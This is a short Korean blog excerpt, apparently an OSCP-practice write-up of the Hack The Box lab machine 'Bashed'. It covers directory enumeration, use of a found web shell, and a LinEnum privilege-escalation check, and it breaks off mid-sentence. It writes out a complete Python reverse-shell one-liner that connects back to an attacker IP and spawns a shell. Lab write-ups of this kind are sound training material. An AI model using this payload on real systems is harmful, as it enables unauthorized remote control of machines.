OSCP(HTB) (1) 썸네일형 리스트형 Bashed 1. Enumeration홈페이지 접근gobuster로 디렉토리 파악2. Exploitation웹쉘 발견파이썬 존재 확인python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.18",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 페이로드 입력리버스 쉘 회득3. Privilege Escalationlinenum 코드 복사 bashed 디렉토리에서 웹서버를 열고 wget으로 linenum 파일 다운로드linEnum 실행권한 추가 후 실행, linEnum으로.. 이전 1 다음
